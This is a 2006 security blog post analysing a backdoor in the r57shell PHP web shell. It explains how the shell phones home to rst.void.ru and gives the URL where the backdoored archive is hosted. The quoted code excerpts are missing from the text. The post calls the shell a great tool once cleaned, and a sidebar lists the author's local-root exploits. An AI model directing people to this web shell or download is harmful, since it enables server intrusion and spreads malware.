.comment-link {margin-left:.6em;}
Xavier's Security Post
Tuesday, September 12, 2006
  Deception within Obfuscation
A few days ago "full_disclosure full_disclosure" posted on [Full Disclosure] about the present malware in r57shell. As some of you may know; r57shell is a PHP script that is often used by attackers and penetration testers alike in remote and local inclusion scenarios for the sake of having a fully-packed PHP shell interface. When using scripts the likes of r57shell one must always keep in mind that authors of such tools are usually intelligent beings who are capable of smuggling obscure means of deception.

Lets look at a few ways the r57shell developers can spot your attacks, and, even attack the servers you have successfully attacked in accordance to r57shell version 1.31:

1) Lines 1504 to 1510:In human translation:In essence the above doesn't look too suspicious but be forewarned--it is quite dangerous. In exhibit 'f' your browser is instructed to view an image from the rst.void.ru web server. The variable 'img' is set to "1" as to almost declare to the developers of r57shell that the incoming IP address is of the attacker. In other words--the developers of r57shell know who attacked what. In exhibit 'g' the server is instructed to read a file off of the rst.void.ru web server. It does not set the variable 'img' to "1" which may indicate that the incoming server is the vulnerable box. That gives the r57shell developers the opportunity to take over the server you are attacking.

To give you an idea of the bad intentions of the code above you have to look at exhibits 'b', 'c', and 'e' as they determine whether or not your server is worthwhile. Internal IP and loopback addresses are useless to an attacker who seems interested in a quick and easy hack. The intent of accessing the vulnerable servers IP address is clear--but what is the intent of the developers knowing your IP address? Blackmale? Accusation? Research purposes? The unknown factor is what is dangerous.

2) The original issue posted on Full Disclosure originally is in lines 1469-1487, 1593 to 1595, and 2204. I am not going to paste the contents of 1469 to 1487 as its a big chunk of base64 code, but the following is its human translation:Clearly it seems the authors of r57shell have attempted, successfully, to spread malware within the form of malware itself.

The backdoored code is still hosted at: http://rst.void.ru/download/r57shell.txt.gz

To their credit though, it's a great tool regardless. Just need to yank out the bad stuff :)

» digg it
This public blog will be a place for me to output any Security findings, both technological and physical, that I have come about. I will post Security advisories I was apart of, and also other interesting bits of knowledge. email: xavier [at] tigerteam.se

Rocks Clusters <=4.1 mount-loop local root
Rocks Clusters <=4.1 umount-loop local root
TSEAD-200606-6 - Rocks Clusters <=4.1 local root
xorgmodroot.py - Xorg-server 1.0 / <=X11R6.9.0-7.0 local root
TSEAD-200509-5 - Multiple Netscape.com vulnerabilities.
TSEAD-200512-3 - Multiple vulnerabilities in KISBG <=v5.1.1
fsigk_exp.py - FSIGK for Linux <=2.10-431 local root
TSEAD-200510-4 - FSIGK for Linux <=2.10-431 advisory
ritk.php - remote inclusion pentest tool
owm_exp.py - openwebmail <=2.51+ local root
perliodebug_exp.py - perlIO_debug 5.8.* local root
bankfix.py - bank card number lookup tool
TSEAD-200412-2 - AOL XSS/file read vuln
TSEAD-200412-1 - AOL redir vuln

September 2005 / October 2005 / November 2005 / December 2005 / March 2006 / April 2006 / May 2006 / June 2006 / July 2006 / September 2006 / October 2006 /